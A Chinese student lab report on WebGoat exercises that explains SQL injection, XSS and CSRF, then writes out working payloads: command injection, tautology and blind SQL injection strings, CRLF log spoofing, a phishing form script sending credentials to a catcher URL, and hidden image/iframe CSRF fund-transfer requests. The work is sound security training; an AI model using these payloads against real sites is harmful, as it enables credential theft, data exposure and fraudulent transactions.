2019-2020-2 网络对抗技术 20175205 Exp 9 Web安全基础
基础问题回答
1、 SQL注入攻击原理,如何防御
- 原理:
- SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令;
- 利用是指利用设计上的漏洞,在目标服务器上运行Sql语句以及进行其他方式的攻击,动态生成Sql语句时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因;
- 通过在用户名、密码登输入框中输入一些
',--,#等特殊字符,实现引号闭合、注释部分SQL语句,利用永真式实现登录、显示信息等目的。其实就是输入框中的字符提交到后台的数据库中会与SQL语句组合拼接,如果猜测出后台的SQL语句格式,然后有针对性的输入,就可以达到相应目的。
- 防御
- 可以在后台控制输入的长度或者禁止用户输入一些特殊符号,例如
-- 、'等; - 对漏洞注入点相关代码进行关键字的过滤(如:利用正则表达式),以规范代码安全性。
- 可以在后台控制输入的长度或者禁止用户输入一些特殊符号,例如
2、 XSS攻击的原理,如何防御
- 原理:
- XSS:跨站脚本。攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;
- 由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本;
- 攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。
- 防御
- 用户角度:提高防范意识,不要轻易输入个人信息,如用户名密码;
- 网页编写者角度:在输入到输出的过程中进行过滤、转义
- 过滤
<和>标记,XSS跨站攻击的最终目标是引入script代码在用户的浏览器中执行,所以最基本最简单的过滤方法,就是转换<和>标记; - HTML属性过滤,一旦用户输入的语句中含有
javascript,jscript,vbscript,都用空白代替; - 过滤特殊字符:
&、回车和空格。
- 过滤
3、 CSRF攻击原理,如何防御
- 原理:
- CSRF:跨站请求伪造,就是冒名登录
- 跨站请求伪造的核心本质是窃取用户的Session,或者说Cookie,因为目前主流情况Session都是存在Cookie中。攻击者并不关心被害者具体帐号和密码,因为一旦用户进行了登录,Session就是用户的唯一凭证,只要攻击者能够得到Session,就可以伪装成被害者进入服务器;
- 主要是当访问网站A时输入用户名和密码,在通过验证后,网站A产生Cookie信息并返回,此时登录网站A成功,可正常发送请求到网站A。在未退出网站A前,若访问另一个网站B,网站B可返回一些攻击性代码并请求访问网站A;因此在网站B的请求下,向网站A发出请求。但网站A不知道该请求恶意的,因此还是会执行该恶意代码。
- 防御
- 可以别让浏览器记住密码,这样就没有cookie了,也没有可获取的东西;‘
- 可以在form中包含秘密信息、用户指定的代号作为cookie之外的验证;
- 添加随机验证。
实验内容
任务一:WebGoat
Webgoat是OWASP组织研究出的一个专门进行web漏洞实验的应用品台,这个平台里包含了web中常见的各种漏洞,例如:跨站脚本攻击、sql注入、访问控制、隐藏字段、Cookie等;
1、下载webgoat-container-7.0.1-war-exec.jar文件
2、 因WebGoat默认使用8080端口,所以开启前先用netstat -tupln | grep 8080查看端口是否被占用,如果被占用,用kill 进程号终止占用8080端口的进程。
3、 普通安装,需要在含有“webgoat-container-7.0.1-war-exec.jar”文件的目录下执行java -jar webgoat-container-7.0.1-war-exec.jar
4、 浏览器打开WebGoat
- 在浏览器中输入
“http://localhost:8080/WebGoat”进入WebGoat登录界面 - 直接用默认用户名密码登录即可;
任务二:SQL注入攻击(Injection Flaws)
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
命令注入(Command Injection)
1、 概念:命令注入攻击对任何一个以参数驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这类风险数目令人难以置信,互联网中的系统很容易受到这种形式的攻击。
2、 原理:在正常的参数提交过程中添加恶意代码以执行某条指令。
3、 目标:可以在目标主机上执行任何系统命令
4、 操作方法:
-
右键点击页面,选择
inspect Element审查网页元素对源代码进行修改 -
在复选框中任意一栏的代码,右键单击后,选择
Edit At Html进行修改,添加"& netstat -an & ipconfig"
-
点击
view,可以看到执行指令后的网络端口使用情况和IP地址。攻击成功!
数字型注入(Numeric SQL Injection)
1、 概念:注入数字型数据(如:永真式)达到注入的效果。
2、 原理:在station字段中注入特征字符,组合成新的SQL语句。
如: SELECT * FROM weather_data WHERE station = [station]
3、 目标:该例子通过注入SQL字符串查看所有的天气数据。
4、 操作方法:
-
右键点击页面,选择
inspect Element审查网页元素对源代码进行修改 -
在选中的城市编号Value值中添加
or 1=1
-
显示所有城市的天气情况,攻击成功!
日志欺骗(Log Spoofing)
1、 概念:通过在日志文件中插入脚本实现欺骗。
2、 原理:在日志文件中愚弄人的眼睛,攻击者可以利用这种方式清除他们在日志中的痕迹
3、 目标:灰色区域代表在 Web 服务器的日志中的记录的内容,我们的目的是使用户名为“admin”的用户在日志中显示“成功登录”
4、 操作方法:
-
前提:本题目接受用户输入的任何一个用户名,并将其追加到日志文件中。
-
利用回车(0D%)和换行符(%0A),在 username 中填入
Hy%0d%0aLogin Succeeded for username: admin,利用回车(0D%)和换行符(%0A)让其在日志中两行显示 -
点击Login,可见Hy在Login Fail那行显示,我们自己添加的语句在下一行显示:
-
进而可以想到,可以向日志文件中添加恶意脚本,脚本的返回信息管理员能够通过浏览器看到。
-
用户名输入
admin <script>alert(document.cookie)</script>,管理员可以看到弹窗的cookie信息。
SQL 注入(LAB: SQL Injection)
Stage 1:字符串型注入(Stage 1: String SQL Injection)
1、 原理:通过注入字符串绕过认证
2、 操作方法:
-
右键点击页面,选择
inspect Element审查网页元素对源代码进行修改 -
将password密码框的最大长度限制改为18
-
以用户
Neville(admin)登录,输入密码hello' or '1' = '1
Stage 3: 数字型 SQL 注入(Stage 3: Numeric SQL Injection)
1、 原理:通过注入数字型数据,绕过认证,可以通过普通员工的账户,查看到BOSS的用户信息。
2、 操作方法:
-
使用用户名
Larry,密码larry点击login登录,点击ViewProfile查看用户信息
-
右键点击页面,选择inspect Element审查网页元素源代码,我们可以看到数据库索引的依据是员工ID,推测返回的是每次查询到的第一条数据。
-
用社会工程学解释老板应该是工资最高的,所以将员工ID的value改成
101 or 1=1 order by salary desc,使得老板的信息作为查询到的第一条数据。
-
得到老板的账户信息,攻击成功!(注意在larry登陆状态下,改html,然后查询)
字符串注入(String SQL Injection)
1、 概念:通过注入字符串绕过认证
2、 原理:基于以下查询语句构造自己的 SQL 注入字符串。
SELECT * FROM user_data WHERE last_name = '?'
3、 目的:尝试通过 SQL 注入将所有信用卡信息显示出来。
4、 操作方法:
-
正常情况下只能查询到用户名对应的信用卡号码
-
输入查询的用户名
Smith' or 1=1--,这样Smith 和1=1都成了查询的条件,而1=1是恒等式,这样就能select表里面的所有数据 -
得到所有用户的信用卡号码,攻击成功!
数字型盲注入(Blind Numeric SQL Injection)
1、 原理:某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。
2、 目标:该题目允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或假)测试检查数据库中其它条目信息。我们找到 pins 表中 cc_number 字段值为 1111222233334444 的记录中 pin 字段的数值。pin 字段类型为 int,整型。输入找到的数值并提交,通过该题目。
3、 操作方法:
- 本题目中,服务端页面返回的信息只有两种:帐号有效或无效。因此无法简单地查询到帐号的PIN数值。但我们可以利用系统后台在用的查询语句
SELECT * FROM user_data WHERE userid=accountNumber;
-
如果该查询语句返回了帐号的信息,页面将提示帐号有效,否则提示无效。使用 AND 函数,我们可以添加一些额外的查询条件。如果该查询条件同样为真,则返回结果应提示帐 号有效,否则无效。
-
例如:输入查询语句101 AND 1=1 ,因为两个条件都成立,所以页面返回帐号有效
-
输入查询语句101 AND 1=2,因为第二个条件不成立,所以而页面返回帐号无效
-
针对查询语句的后半部分构造复杂语句,如:
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 )
如果提示无效,则pin值小于5000,使用二分法,最终得出pin的值为2364
字符串型盲注入(Blind String SQL Injection)
1、 原理:与数字型盲注入类似,某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。
2、 目标:找到 pins 表中 cc_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值(最终的字符串,注意拼写和大写)并提交,通过本题目。
3、 操作方法:
- 与数字型盲注入类似,只是将注入的数字换为字符串而已
- 例如:输入
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'M' )
取得 pin 字段数值的第一个字母,并判断其是否比字母“M”小
- SUBSTRING 语法为 SUBSTRING(STRING,START,LENGTH)
- 同样使用二分法进行测试,最后得到pin字段为Jill
任务三:XSS攻击
跨站脚本攻击是通过HTML注入劫持用户的浏览器,任意构造用户当前浏览的HTML内容,可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。
XSS 钓鱼(Phishing with XSS)
1、 原理:当用户输入非法HTTP响应时容易受到XSS攻击。在XSS的帮助下,可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。
2、 目标:创建一个 form,要求填写用户名和密码。将数据提交到
http://localhost/WebGoat/catche r?PROPERTY=yes&user=catchedUserName&password=catchedPasswordNam
3、 操作方法:
- 利用XSS可以在已存在的页面中进一步添加元素,包括两部分:
- 受害人填写一个表格;
- 服务器以读取脚本的形式,将收集到的信息发送给攻击者。
- 编写一段脚本读取被攻击者在表单上输入的用户名和密码信息,将这些信息发送给捕获这些信息的 WebGoat
- 编写一个带用户名和密码输入框的表格
- 将下面这段代码输入到"Search:"输入框中,点击search;结果会出现代码中所指定的绿、红、蓝三块div,并在下方出现了用于欺骗用户的提示语“This feature requires account login:”和用户名、密码输入框。
<head>
<body>
<div>
<div style="float:left;height:100px;50%;background-color:green;"></div>
<div style="float:left;height:100px;50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>
- 如果真的在登录框中输入用户名、密码,eg:20175205 20175205,点击登录后,会像代码中alert提示的,显示被窃取的用户名和密码。
存储型XSS攻击(Stored XSS Attacks)
1、 原理:这种攻击常见于论坛等留言平台,用户留言的时候输入一段JavaScript脚本,这段脚本就会被保存在数据库中。因为是留言,所以任何用户在打开网页的时候,这个脚本就会被从数据库中取出来而运行。
2、 目标:写入非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容
3、 攻击:
- 通过javascript获取用户的cookie,根据这个cookie窃取用户信息
- 重定向网站到一个钓鱼网站
- 重新更改页面内容,假装让客户输入用户名,密码,然后提交到黑客的服务器
4、 操作方法:
- 在title中任意输入字符,留言板中输入
<head>
<body>
<div>
<div style="float:left;height:100px;50%;background-color:green;"></div>
<div style="float:left;height:100px;50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>
-
提交后,下方
“Message List”中会新增刚输入的Tile名字的链接,点击链接。 -
可以看到我们的html已经注入成功,messege部分显示的是绿、红、蓝三色框
-
在下方用户名密码处输入,eg:20175205 20175205,点击提交后,被成功获取用户名和密码
反射型XSS攻击(Reflected XSS Attacks)
1、 原理:
- 我们在访问一个网页的时候,在URL后面加上参数,服务器根据请求的参数值构造不同的HTML返回。
- value可能出现在返回的HTML(可能是JS,HTML某元素的内容或者属性)中,如果将value改成可以在浏览器中被解释执行的东西,就形成了反射型XSS。
- 别人可能修改这个value值,然后将这个恶意的URL发送给你,当URL地址被打开时,特有的恶意代码参数就会被HTML解析执行。
- 它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。
2、 存储型XSS与反射型XSS的区别:
- 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。
- 反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。
3、 目标:使用攻击脚本创建URL,并将其写入网站中,当读取到该URL的时候就会被攻击
4、 操作方法:
- 输入代码
<script>alert("hiahiahia You've been attacked!!! I'm Hy~ luelue");</script>
-
点击purse,成功显示警告框,内容为我们script脚本指定的内容:
-
假如我们输入前面编写的脚本,原理相同,同样会成功:
任务四:CSRF攻击
跨站请求伪造,尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
跨站请求伪造(Cross Site Request Forgery (CSRF))
1、 原理:跨站请求伪造是一种让受害者加载一个包含网页的图片的一种攻击手段。如:,当受害者的浏览器试图呈现此页面时,它将使用指定的参数向www.mybank.com的“me”端点发出请求。浏览器将请求链接以获得图像,即使它实际上是一个资金转移功能。提交请求时,浏览器将添加与站点相关的所有cookie。因此,如果用户对站点进行了身份验证,并且拥有永久或当前会话cookie,那么站点将无法将其与合法的用户请求区分开来。通过这种方式,攻击者可以让受害者执行他们不打算执行的操作,比如“购买物品”,或者脆弱网站提供的任何其他功能。
2、 目标:向新闻组发送一封email。这个email包含一个image,其URL指向一个恶意请求。URL应该指向“攻击”servlet,其中包含“屏幕”和“菜单”参数,以及一个额外的参数“transferFunds”,其数值为5000。可以通过在右侧插入的参数中找到“Screen”和“menu”值来构造链接。当经过身份验证的CSRF电子邮件的收件人将被转移他们的资金。
3、 操作方法:
-
查看页面右侧Parameters中的src和menu值,分别为324和900
-
在title中输入任何参数,message框中输入
<img src="http://localhost:8080/WebGoat/attack?Screen=324&menu=900&transferFunds=5000" width="1" height="1" />
- 以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交
- 这里src值、menu值要根据上一步查看的结果修改,转账数额随便输入,eg:5000
- 宽高设置成1像素的目的是隐藏该图片
- 提交后,在Message List中生成以Title命名的链接(消息)。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。
绕过 CSRF 确认( CSRF Prompt By‐Pass)
1、 原理:跨站点请求伪造(CSRF/XSRF)是一种攻击,它欺骗受害者加载包含“伪造请求”的页面,以便使用受害者的凭据执行命令。提示用户确认或取消命令可能听起来像一个解决方案,但如果提示符是可编写脚本的,则可以忽略它。本课展示如何通过发出另一个伪造的请求来绕过这样的提示符。这也适用于一系列提示,例如向导或发出多个不相关的伪造请求。
2、 目标:与上一个题目类似,向包含多个恶意请求的新闻组发送电子邮件:第一个请求用于转移资金,第二个请求用于确认第一个请求触发的提示符。url应该指向攻击servlet,其中包含这个CSRF-prompt-by-pass课程的屏幕、菜单参数和一个额外的参数“transferFunds”,其中包含一个数值“5000”来启动传输,一个字符串值“CONFIRM”来完成传输。您可以从右边的插图中复制课程的参数,创建格式为attack?Screen=XXX&menu=YYY&transferFunds=ZZZ的url。无论谁收到这封电子邮件,并且碰巧在那个时候通过了身份验证,他的资金就会被转移。
3、 操作方法:
- 同上一个攻击,查看页面下侧Parameters中的src和menu值(327和900),并在title框中输入学号,message框中输入代码:
<iframe src="attack?Screen=327&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=327&menu=900&transferFunds=CONFIRM"> </iframe>
- 在Message List中生成以Title命名的链接"20175205Hy"
- 点击进入后,如图攻击成功:
实验中遇到的问题及解决方法
Q1:安装webGoat,这是什么奇怪的问题,文件被损坏?不能叭
A1:因为编译后的java程序与kali上的java Se版本不一致,所以需要安装对应的JDK。因此需要先安装对应版本的JDK,再安装webGoat哦
- 下载jdk安装包
- 建立目录,将下载的jdk复制过去并解压
sudo mkdir -p /usr/local/java
sudo cp jdk-8u161-linux-x64.tar.gz /usr/local/java
cd /usr/local/java
sudo tar xzvf jdk-8u161-linux-x64.tar.g
- 配置环境变量
sudo vim /etc/profile
###复制以下代码到文件结尾
JAVA_HOME=/usr/local/java/jdk1.8.0_161
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
- 通知系统java的位置
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_161/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.8.0_161/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_161/bin/javaws" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_161/bin/javaws" 1
- 设置默认JDK
sudo update-alternatives --set java /usr/local/java/jdk1.8.0_161/bin/java
sudo update-alternatives --set javac /usr/local/java/jdk1.8.0_161/bin/javac
sudo update-alternatives --set javaws /usr/local/java/jdk1.8.0_161/bin/javaws
- 重新载入profile
source /etc/profile
- 通过
java -version以及javac -version即可看到是否安装完成
实验感想
- 这是本学期漫漫实验路最后一站啦,接触了很多以前只是概念上了解的实践内容。但是也是通过这些动手实验,也发现我们的网络环境其实很不安全,平时要格外注意保护个人的信息安全。
- 本次实验这些攻击方式其实之前多少都接触了解过,但是概念就都糊成一坨,有点没分清。通过本次实验,将知识体系清晰化,分清了SQL注入攻击、XSS跨站脚本攻击、CSRF跨站请求伪造攻击,感觉web安全这部分内容也十分有趣,希望本次学习到的内容以后可以用到哇哈哈哈哈。